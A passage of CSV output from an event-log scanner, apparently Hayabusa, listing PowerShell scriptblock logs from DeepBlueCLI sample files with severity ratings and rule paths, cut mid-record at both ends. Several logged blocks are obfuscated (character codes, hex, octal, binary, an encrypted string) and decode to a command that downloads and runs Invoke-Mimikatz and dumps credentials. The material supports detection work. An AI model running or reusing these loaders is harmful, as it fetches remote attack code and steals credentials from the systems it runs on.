}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:01:28.780 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:08.894 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:08.929 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:08.986 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.026 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.052 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.081 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.119 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.152 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.159 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.189 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.191 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:09.237 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:28.360 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('76492d1116743f0423413b16050a5345MgB8AFEAcwB0AHAAaAAwAGEAWABRAG8AcgBMAEMAdAAyAFgANwAyAGsATABCAFEAPQA9AHwAZQBjADMAOAAxAGYAOAA4ADcANAA2ADIAYQAzADgANwBjADIANgAyAGYAYQA0ADYAYgBhADAANgBmADkAZgA4AGYAZQBiADQANgBlADAAYwAxADYAYwBmADIAZABhADEAMgA5ADQANwA0ADEAMAA1ADAAYQA1ADQAMwBmADAAMAAyAGEAYgBiADMAMQBhADgAMgBjADUAYQBkADcAMwBlADAAMQA4ADAANABiADEAYwA2AGQAOQAwADMAMgA0ADYAMgA5ADcAZgAwAGMAMwBkADUANABiAGYAOAAwADEAMQBmAGIAYQBhADAAOABiADIANwAxADQAMgAxADUANgAxADQAZgBlAGYAOQBiADQAMwAwADEAMAA3ADQAZQA3AGMAYgBkADQANQBlADAANwBkADYAYQBhADMAYwA1AGUAZQBhAGUANAAzADEANgBlAGQAOQA4ADcAMQAyADYAOABlADEAMgAxADkAYQBmADgANwBkAGIAOQBhADMAYgAzAGQAZAA1AGMANAA4ADcAZgBhAGYAYQBhAGUAZQBmAGIAOAA2ADAAMAAwADkAYgAwAGEAZgA1AGEAYwBmADUANgBjAGIAMQA5ADIAYQBmADYAYwAzADAAYwBlADYAYwA3AGIANQAxAGEAMQBlADMANwBjADYAMgBmAGQAZAAxADUAMAA0ADcAMQBiAGMAOQBkAGQAOAA5ADYAMwAwAGEAOQBjAGUANQAzADQANwA2ADkAZgAyAGYAOQA2ADgANgA2ADEAMQAxADkAYwBkADYAZQA2AGQAZABlAGEANgBlAGMAYwA0ADYANwBjAGMAYQAyADAAMQBmADUAZgA4ADUANAA4ADMANwA2AGYAOAAxADIAYQBhAGUAYgBjADMAYQAwADYAOQA5AGMAZQBjADkAOQAzADkAMQA0ADIANAAyAGEAZgAwAGUAYwA2ADIANwBlAGUANwBmADQANwBmADgAMgA2ADkANQAxAGMAMwBmAGQAMQA5ADMANwAzAGEAOAA0AGQANAA2AGIAZAA3ADQAYgAwAGIAMQAwADIAZgBkADMAYQBmADEAYgBiADkAYgAzADYAMQA5ADQANQA2ADQAMQA1ADcAMwA2ADYAMQA0ADAAMABlAGQANAAyADQAYQA2ADYAMwA0AGMAZQBiAGUAZQBkADUAYgAxADkANwBlAGMANgA1ADkANQAyADcAYQBmADYAYQA0ADYAMQBmAGUAOABkADEAOAAwAGMAMwBkAGUAYgBlAGEAMAAzADIAYgA1ADYAYQA5AGEAMABjADYAZAAwADQANABiAGYAZABjADMANwA0ADgAYwA1ADMAZQBjAGQAMQA4ADAAMQAwAGIAYQBhAGEAMAA1AGUAZgAyAGUAZABlAGMAMwA5ADkAMQAyADAAZgBjADgANwAyAGEANwA3ADcAOQA2AGUAZQBjADkAYwAwADIANQBjAGIAOAA2AGQAOQBkAGQAMQBjAGUANABlAGUAMABjADcAMQA3ADkANQAzAGQAOQA3AGUAYgBjAGEANgBmADMANwAxADYAMwBiAGMAYgA5ADQANQAxADQANAAxAGQAMABiADIAMQA0ADEAMQA3ADUAMAA4AGEAMAA4ADUAOABlADcAOABlADYANQA2ADQAZQAwADcANAA3ADYANQA5ADYAYQA5ADcANgAyADgANwAyADIAMwAyADEAZgA1ADkAYgBkADUANgA0AGEAMgBlAGEAYwBiADUAZQAwAGEANQAxAGEAOQAwADMANQA2ADYAMQBiAGMAYQA2ADgAMQA3ADAAOQBjADgAMwA5AGQAOQBhADUANgA1ADIAMABlADMAMgBiAGIAMwA4ADMAZAA5ADQAYwAxAGUANgBlADcANQBmAGIAOQAzADAANAAwAGMAZAA1AGQAYwA5AGEAMgA2ADcAMABjADcAOABhADQANgBiAGUAYQA4ADUAMgA='|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:28.360 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"iNVOkE-expRessION (( [RUNTiMe.inTEROPsErVices.MARsHaL]::ptrTOsTRINgautO( [runTIME.IntErOPsERvIceS.MarSHAL]::SEcureSTRIngtObsTr($('76492d1116743f0423413b16050a5345MgB8AFEAcwB0AHAAaAAwAGEAWABRAG8AcgBMAEMAdAAyAFgANwAyAGsATABCAFEAPQA9AHwAZQBjADMAOAAxAGYAOAA4ADcANAA2ADIAYQAzADgANwBjADIANgAyAGYAYQA0ADYAYgBhADAANgBmADkAZgA4AGYAZQBiADQANgBlADAAYwAxADYAYwBmADIAZABhADEAMgA5ADQANwA0ADEAMAA1ADAAYQA1ADQAMwBmADAAMAAyAGEAYgBiADMAMQBhADgAMgBjADUAYQBkADcAMwBlADAAMQA4ADAANABiADEAYwA2AGQAOQAwADMAMgA0ADYAMgA5ADcAZgAwAGMAMwBkADUANABiAGYAOAAwADEAMQBmAGIAYQBhADAAOABiADIANwAxADQAMgAxADUANgAxADQAZgBlAGYAOQBiADQAMwAwADEAMAA3ADQAZQA3AGMAYgBkADQANQBlADAANwBkADYAYQBhADMAYwA1AGUAZQBhAGUANAAzADEANgBlAGQAOQA4ADcAMQAyADYAOABlADEAMgAxADkAYQBmADgANwBkAGIAOQBhADMAYgAzAGQAZAA1AGMANAA4ADcAZgBhAGYAYQBhAGUAZQBmAGIAOAA2ADAAMAAwADkAYgAwAGEAZgA1AGEAYwBmADUANgBjAGIAMQA5ADIAYQBmADYAYwAzADAAYwBlADYAYwA3AGIANQAxAGEAMQBlADMANwBjADYAMgBmAGQAZAAxADUAMAA0ADcAMQBiAGMAOQBkAGQAOAA5ADYAMwAwAGEAOQBjAGUANQAzADQANwA2ADkAZgAyAGYAOQA2ADgANgA2ADEAMQAxADkAYwBkADYAZQA2AGQAZABlAGEANgBlAGMAYwA0ADYANwBjAGMAYQAyADAAMQBmADUAZgA4ADUANAA4ADMANwA2AGYAOAAxADIAYQBhAGUAYgBjADMAYQAwADYAOQA5AGMAZQBjADkAOQAzADkAMQA0ADIANAAyAGEAZgAwAGUAYwA2ADIANwBlAGUANwBmADQANwBmADgAMgA2ADkANQAxAGMAMwBmAGQAMQA5ADMANwAzAGEAOAA0AGQANAA2AGIAZAA3ADQAYgAwAGIAMQAwADIAZgBkADMAYQBmADEAYgBiADkAYgAzADYAMQA5ADQANQA2ADQAMQA1ADcAMwA2ADYAMQA0ADAAMABlAGQANAAyADQAYQA2ADYAMwA0AGMAZQBiAGUAZQBkADUAYgAxADkANwBlAGMANgA1ADkANQAyADcAYQBmADYAYQA0ADYAMQBmAGUAOABkADEAOAAwAGMAMwBkAGUAYgBlAGEAMAAzADIAYgA1ADYAYQA5AGEAMABjADYAZAAwADQANABiAGYAZABjADMANwA0ADgAYwA1ADMAZQBjAGQAMQA4ADAAMQAwAGIAYQBhAGEAMAA1AGUAZgAyAGUAZABlAGMAMwA5ADkAMQAyADAAZgBjADgANwAyAGEANwA3ADcAOQA2AGUAZQBjADkAYwAwADIANQBjAGIAOAA2AGQAOQBkAGQAMQBjAGUANABlAGUAMABjADcAMQA3ADkANQAzAGQAOQA3AGUAYgBjAGEANgBmADMANwAxADYAMwBiAGMAYgA5ADQANQAxADQANAAxAGQAMABiADIAMQA0ADEAMQA3ADUAMAA4AGEAMAA4ADUAOABlADcAOABlADYANQA2ADQAZQAwADcANAA3ADYANQA5ADYAYQA5ADcANgAyADgANwAyADIAMwAyADEAZgA1ADkAYgBkADUANgA0AGEAMgBlAGEAYwBiADUAZQAwAGEANQAxAGEAOQAwADMANQA2ADYAMQBiAGMAYQA2ADgAMQA3ADAAOQBjADgAMwA5AGQAOQBhADUANgA1ADIAMABlADMAMgBiAGIAMwA4ADMAZAA5ADQAYwAxAGUANgBlADcANQBmAGIAOQAzADAANAAwAGMAZAA1AGQAYwA5AGEAMgA2ADcAMABjADcAOABhADQANgBiAGUAYQA4ADUAMgA='|CoNverTTo-secuReStriNG -k 82,189,200,92,184,235,46,38,211,250,202,240,198,208,70,100,210,121,211,227,2,148,77,154,149,200,93,130,24,30,119,255) ) )) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 04:13:38.198 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $eNv:COmSPEc[4,15,25]-JoIN'') ([ChAr[]] (73, 69 , 88 ,32 ,40,78 ,101 ,119 ,45, 79, 98,106 ,101,99 , 116 ,32 ,78,101, 116, 46,87, 101 ,98 , 67 ,108 ,105,101 ,110, 116 ,41 , 46, 68, 111 ,119 , 110 , 108 , 111 ,97 ,100 , 83,116, 114,105 , 110, 103, 40 , 39, 104, 116 , 116,112 , 115,58,47,47 ,114, 97 ,119,46 , 103,105 , 116, 104,117, 98 ,117 , 115 , 101 ,114,99, 111 ,110 , 116,101 ,110 , 116, 46 , 99 , 111,109 ,47 ,109 ,97,116 , 116,105,102, 101 , 115 , 116,97 , 116 ,105 ,111 , 110,47,80,111 ,119 , 101,114,83, 112, 108,111, 105,116 ,47,109, 97 , 115 , 116, 101 ,114,47 ,69 ,120, 102,105, 108,116 , 114, 97,116 , 105,111,110, 47 , 73,110 ,118 ,111 , 107 , 101,45 , 77, 105 ,109 , 105, 107 , 97 , 116, 122 , 46 ,112 ,115, 49, 39 ,41 , 59 , 32,73 , 110 , 118 ,111 ,107 ,101,45,77,105 , 109 ,105, 107 ,97, 116 ,122,32 ,45 , 68 ,117 ,109,112 , 67 ,114 , 101,100 , 115 )-join '')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:13:52.552 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"[sTRInG]::jOiN('' , (( 49 ,45 , 58,20,28 , '4e',65,77 , '2d' ,'4f' ,62 , '6a' , 65,63, 74 ,20 ,'4e', 65 ,74 ,'2e' ,57, 65 , 62,43 ,'6c',69, 65 , '6e' , 74 ,29 ,'2e',44,'6f' , 77 ,'6e','6c' , '6f' ,61, 64 ,53 , 74,72 ,69 ,'6e',67, 28, 27 , 68 ,74, 74,70 ,73, '3a', '2f','2f', 72, 61, 77 , '2e',67,69, 74 ,68 , 75,62, 75, 73,65 ,72,63, '6f','6e',74 ,65, '6e', 74 ,'2e',63 ,'6f', '6d','2f' , '6d', 61 ,74 ,74, 69,66 , 65, 73 ,74 ,61, 74 , 69 ,'6f' , '6e', '2f' ,50,'6f',77, 65,72,53 ,70, '6c' , '6f' ,69 ,74, '2f' , '6d' , 61 , 73 , 74,65,72 , '2f' ,45,78,66, 69, '6c', 74 , 72,61, 74,69,'6f' , '6e' , '2f' , 49,'6e' , 76, '6f','6b' ,65 , '2d' , '4d' ,69,'6d' , 69, '6b',61 , 74 , '7a' , '2e',70, 73 , 31 , 27, 29 ,'3b' ,20 ,49 ,'6e' , 76,'6f', '6b', 65, '2d', '4d',69, '6d' ,69,'6b' , 61 ,74, '7a' , 20 , '2d' ,44 , 75,'6d' , 70, 43, 72 ,65 ,64 , 73)|FoReaCh{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}))|&( $enV:PuBlic[13]+$eNv:PUbliC[5]+'X')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:13:52.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([ChaR] ([Convert]::TOiNt16(($_.tOsTriNg()),16 )))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.419 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.432 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.518 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.526 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.531 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.534 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.537 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.539 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.543 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.590 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.603 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.765 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.772 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:24.809 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:33.323 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"& ( $ENV:pUbLIc[13]+$EnV:pubLIc[5]+'X') ([STrIng]::JOin('' , ((111 ,105, 130 , 40,50,116 ,145 , 167, 55,117,142 , 152 ,145,143 ,164 , 40, 116,145,164,56, 127, 145 ,142, 103 ,154, 151 ,145 ,156 , 164,51, 56 , 104 ,157, 167 ,156 , 154 , 157 , 141 , 144, 123 ,164,162 ,151, 156,147, 50 ,47 ,150 , 164,164,160 , 163 , 72,57, 57,162, 141,167 , 56,147 ,151, 164,150, 165, 142 ,165 , 163, 145, 162,143 ,157, 156 ,164 ,145,156 , 164,56 ,143 ,157 ,155,57, 155 ,141, 164 , 164, 151 , 146,145 ,163, 164 , 141, 164 ,151, 157, 156 ,57 , 120 ,157,167 , 145,162 , 123,160 , 154, 157, 151, 164, 57,155 , 141, 163 ,164,145,162,57,105, 170 , 146,151, 154, 164 , 162 , 141,164,151,157,156 , 57,111,156 , 166 , 157, 153, 145,55, 115 ,151, 155 ,151, 153,141, 164 ,172,56, 160 , 163, 61 ,47 ,51,73 , 40,111,156 , 166, 157 ,153 , 145 ,55 ,115, 151 , 155 ,151 ,153 , 141, 164 ,172 ,40,55, 104,165 , 155, 160 ,103, 162 , 145 , 144 , 163 )| FOrEacH { ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) } )))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:33.323 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([cHar] ([coNVErT]::TOiNT16( ([String]$_ ),8) )) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:51.663 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".( $vErBOSePreFErencE.TOSTRING()[1,3]+'X'-joIN'')(( '1001001}1000101r1011000C100000&101000&1001110C1100101r1110111C101101;1001111v1100010;1101010r1100101v1100011j1110100v100000X1001110o1100101}1110100X101110}1010111;1100101r1100010v1000011X1101100v1101001j1100101v1101110j1110100}101001j101110}1000100j1101111g1110111g1101110}1101100g1101111g1100001;1100100;1010011}1110100;1110010g1101001X1101110&1100111X101000v100111}1101000;1110100r1110100j1110000}1110011v111010j101111r101111}1110010o1100001X1110111r101110r1100111X1101001&1110100o1101000g1110101j1100010C1110101}1110011&1100101X1110010}1100011}1101111j1101110v1110100j1100101C1101110;1110100r101110&1100011r1101111;1101101&101111&1101101X1100001}1110100}1110100;1101001o1100110v1100101;1110011C1110100C1100001j1110100r1101001;1101111o1101110o101111j1010000&1101111X1110111}1100101j1110010j1010011&1110000;1101100r1101111r1101001;1110100o101111&1101101v1100001r1110011;1110100g1100101j1110010j101111r1000101v1111000r1100110j1101001X1101100C1110100r1110010;1100001o1110100C1101001;1101111X1101110j101111C1001001X1101110;1110110}1101111r1101011&1100101j101101&1001101r1101001v1101101;1101001o1101011o1100001&1110100o1111010v101110g1110000r1110011}110001g100111o101001v111011j100000;1001001j1101110r1110110X1101111v1101011}1100101v101101;1001101r1101001&1101101;1101001C1101011v1100001&1110100j1111010}100000}101101}1000100C1110101v1101101r1110000v1000011j1110010r1100101v1100100;1110011' -splIT 'o'-splIt '&' -SPlIT 'r' -SplIt 'v' -sPLIT 'g'-SPliT';'-spLIT'X'-sPlIt'}' -sPLIT 'C'-SPLIT'j'|FOReaCH-ObjEct {([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) })-JOIN '' )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:14:51.666 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{([CHaR]([ConvERT]::tOINT16(( [sTRinG]$_),2 ) )) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx 2017-08-31 04:15:23.660 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"( 